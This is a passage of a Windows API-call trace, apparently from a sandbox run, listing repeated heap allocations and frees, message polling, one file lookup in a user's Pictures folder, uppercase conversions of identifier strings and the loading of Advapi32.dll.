Flags=0x0, Size=0x4) returned 0x2a71b98 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.720] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.721] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/619JnEBOuc.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981365d0, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0x1a37ec0, ftLastAccessTime.dwHighDateTime=0x1d5d6be, ftLastWriteTime.dwLowDateTime=0x1a37ec0, ftLastWriteTime.dwHighDateTime=0x1d5d6be, nFileSizeHigh=0x0, nFileSizeLow=0x462f, dwReserved0=0x0, dwReserved1=0x0, cFileName="619JnEBOuc.bmp", cAlternateFileName="619JNE~1.BMP")) returned 0x9e2078 [0208.722] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0208.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.724] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.724] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.725] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.725] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.725] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.725] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.725] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.726] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.726] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.727] 